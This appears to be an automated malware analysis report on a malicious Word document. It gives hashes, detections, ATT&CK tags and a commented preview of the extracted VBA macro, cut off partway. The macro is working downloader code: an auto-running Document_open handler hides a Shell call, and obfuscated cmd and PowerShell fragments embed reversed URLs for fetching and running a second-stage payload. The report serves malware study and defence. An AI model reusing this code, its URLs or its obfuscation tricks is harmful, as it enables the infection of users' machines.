Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b5c96ec8e22f52ae…

MALICIOUS

Office (OLE)

Size: 67.1 KB · Created: 2018-09-06 09:56:00 · Authoring application: Microsoft Office Word · First seen: 2018-10-07
MD5: d5bb2deefe749ff307ea260c1b6488c5 SHA-1: eeff8bac3ee2b327cce1b8349612bc6af2e68eea SHA-256: b5c96ec8e22f52ae3cbfcfe02ab1c8257ab7cdfb25c36a28bdff4032b9f803f5
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1204.002 (User Execution: Malicious File)

The sample contains a VBA macro that is triggered by the Document_open event, so it runs as soon as the document is opened with macros enabled. This macro uses the Shell() function (with vbHide, so no window is shown) to execute a command assembled at run time from string fragments returned by several helper functions, which likely downloads and executes a second-stage payload. The combination of the Shell() call and the auto-executing Document_open macro strongly indicates malicious intent.

Heuristics 5

  • ClamAV: Doc.Malware.Generic-6674221-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6674221-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). Note: this is the standard OOXML DrawingML namespace URI present in ordinary Office documents; it is a schema identifier, not a download location, and should not be treated as an indicator on its own.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5246 bytes
SHA-256: 1abf4ba9bc9a57d54d0d143dc3fb3b19f3aad3786166c23bdae0b96b48d39b0e
Preview script
First 1,000 lines of the extracted script
' Module header written by the VBA project exporter (olevba) — these Attribute
' lines are project metadata, not executable statements. VB_Base ties the module
' to ThisDocument, which is what lets the Document_open handler below auto-run.
Attribute VB_Name = "FrYYzavB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word raises Document_open when the file is opened,
' so this Sub runs with no further user interaction once macros are enabled.
Private Sub Document_open()
' Global error suppression; the single statement is split across four lines with
' line-continuation characters, presumably to defeat simple pattern matching.
' Any failure in the statements below is silently ignored.
On _
Error _
Resume _
Next
' The command passed to Shell() is concatenated at call time from values returned
' by helper functions (OOkjc and oqFMid are visible below; wuaCIU, UIwoOOkwXLkR,
' RwmzBqQhYIb, BFHRSJz, bJfimKBjlHu and vTcCrhiS are outside this preview).
' vbHide hides the spawned process window from the user.
Shell Format(wuaCIU) + UIwoOOkwXLkR + RwmzBqQhYIb + OOkjc + oqFMid + BFHRSJz + bJfimKBjlHu + vTcCrhiS, vbHide
End Sub



' Start of a second VBA module in the same project; it holds the helper
' functions whose return values Document_open concatenates into the Shell() command.
Attribute VB_Name = "dPITHRmjpNF"
' Returns one fragment of the command that Document_open passes to Shell().
' The fragment is built from short string literals plus Chr() applied to
' arithmetic sums, so the final command text never appears as a contiguous
' literal in the macro source (a common static-detection evasion).
Function OOkjc()

' Suppress runtime errors for the rest of the function (same construct as in
' Document_open). This also swallows the type-mismatch errors the `Month "..."`
' statements below would presumably raise for non-date arguments.
On _
Error _
Resume _
Next
' The repeated `Month "..." + "..."` statements discard their return value and
' appear to be filler that pads the module with meaningless string operations;
' the assignments interleaved with them are the parts that matter.
Month "21987121" + "8273"
OkSGSfS = Chr(0 + 9 + 8 + 4 + 78) + "m" + "d" + " /V:^O" + "N/" + Chr(0 + 6 + 5 + 2 + 54) + Chr(0 + 2 + 2 + 1 + 29) + "^s^" + "e^t " + "j^s"
Month "HVtQMn" + "iaLRGtJr"
   Month "ECLzwaqHA" + "w"
   Month "NVwT" + "E" + "h" + "TEG"
   Month "X" + "rpGwpw" + "265407119" + "4106"
rVrjYjSb = "^h=" + " " + "^  " + "^  " + "^ ^ ^ "
Month "R" + "277001790" + "umB" + "L"
   Month "pnzD" + "fIv"
   Month "17478060" + "196649913"
   Month "Q" + "MilC" + "2908" + "250750224"
EEDkKr = "^  ^ " + " " + " ^" + "  ^ " + " ^" + "}}^{^h" + Chr(0 + 9 + 8 + 4 + 78) + "ta" + Chr(0 + 9 + 8 + 4 + 78) + "}^" + ";" + "kaer^b" + "^" + ";^SHn^" + "$ me^t^" + "I"
Month "CpJIfaBN" + "8997"
   Month "tH" + "452227383" + "2515" + "tuUD"
   Month "lbM" + "KAPj"
oOqjh = "-e" + "^k" + "ovn^I^" + ";)^S^" + "Hn^$^ " + ",E^" + "bK^$(e" + "^l^i^"
Month "8476" + "icAo"
   Month "kw" + "fJhLEHPGW"
   Month "zQXX" + "302" + "379991563" + "26525341"
   Month "116455349" + "2748139" + "419308881" + "66051211"
TwptHdTlXhL = "F^" + "d" + "aoln^w" + "^o^D^." + "^pR^U${" + "yrt" + "{)^Jja" + "^$^ n^i" + "^ ^Eb^K" + "^$" + "(^h" + Chr(0 + 9 + 8 + 4 + 78) + "^aer^of"
Month "9968" + "JnzzBQurwWD"
   Month "97156715" + "364273535"
RcIKj = "^;'^e" + "xe^" + ".'+vAz^" + "$+'^\^'" + "+" + Chr(0 + 9 + 8 + 4 + 78) + "i^l^b"
Month "6441" + "ij"
   Month "Ei" + "6878"
   Month "n" + "KsYj"
nzXzo = "^u^p^:" + "vne$=S" + "Hn^$^;" + "^'^" + "0^1" + "8" + "' ^"
Month "dEhGnRFMk" + "2755"
   Month "369541102" + "RMRwwCPFODiTNw"
   Month "Rp" + "c" + "FfiXBhlrHnL" + "rKDBTjFqQ"
   Month "dJjwbsLiuzq" + "jRih" + "Kjv" + "jRYsa"
   Month "XkwSNpfOT" + "o"
zhoYHw = "=^ vA^" + "z^" + "$^;" + ")^" + "'^@^'" + "(t^i^" + "lp" + "S" + ".^'3" + "^Q"
Month "1854" + "SpwAFIUai" + "2144" + "zI"
bjznJHhrkwO = "Hi9b" + "^4/m^o" + Chr(0 + 9 + 8 + 4 + 78) + "^.^" + "hkir^" + "ap" + "^dh" + "^" + "tr" + "a^m^as"
Month "shwtNrpETCIX" + "6899" + "9520" + "lwMDzWNv"
   Month "VjMLjl" + "136814733"
fYMKqW = "//^:pt^" + "th" + "^" + "@F^h" + "^tRT^p" + "D/m" + "^o" + Chr(0 + 9 + 8 + 4 + 78) + ".si" + "draped" + "^"
' Join the ten fragments in declaration order; this is the value Document_open
' receives for OOkjc. The two trailing Month calls after it are further filler.
OOkjc = OkSGSfS + rVrjYjSb + EEDkKr + oOqjh + TwptHdTlXhL + RcIKj + nzXzo + zhoYHw + bjznJHhrkwO + fYMKqW
   Month "445178999" + "QI" + "hkou" + "789"
   Month "AGT" + "O"
End Function
Function oqFMid()

On _
Error _
Resume _
Next
Month "92507663" + "CiFwPukh"
   Month "813" + "l" + "365346307" + "cubjp"
   Month "t" + "396827134"
CrNFfWT = "ham/" + "/:^pt^t" + "h@B" + "^jtS/^m" + "^o" + Chr(0 + 9 + 8 + 4 + 78) + ".^oh" + "^g^-" + "nat//:^" + "p^tth@" + "M^a2^Xm" + "O^O/" + "^m"
Month "Iztbif" + "509609017"
HEjRnbXJzv = "o" + Chr(0 + 9 + 8 + 4 + 78) + "." + "el^as^y" + "tr^e" + "^por" + "^pay" + "na^l^a/" + "/^:^p^t" + "t^h^" + "@^" + "X^K^G"
Month "mUsm" + "337356236"
   Month "437880080" + "BN"
omttbbdWGni = "^Y/" + "^gro^." + "t" + "nem^p" + "^o" + "l" + "^eve^d" + "-^d^4" + "a//:^" + "p^tth'^" + "=Jja^$^"
Month "177375462" + "jIw"
FABsjz = ";^tn^e" + "^i" + "l" + Chr(0 + 6 + 5 + 2 + 54) + "^b" + "e^W." + "^t^eN ^" + "t" + Chr(0 + 9 + 8 + 4 + 78) + "^e^"
Month "330817982" + "jSl" + "48175834" + "634"
KoYGGClBi = "jbo^-we" + "n=^pR^" + "U^$^ " + "^ll" + "e^hs" + "r^ewo" + "^p&&f^o" + "r /" + "^" + "L %" + Chr(0 + 9 + 8 + 4 + 78) + " ^"
Month "iAzAVTFCwS" + "151120773"
   Month "HBoshaqh" + "j" + "508425340" + "9004129"
   Month "BsVzvkDnzjKmtH" + "uHzoON"
SldrCOTA = "in (" + "^" + "368^;^-" + "^1^" + ";^" + "0)^d" + "o ^s" + "e^"
oqFMid = CrNFfWT + HEjRnbXJzv 
... (truncated)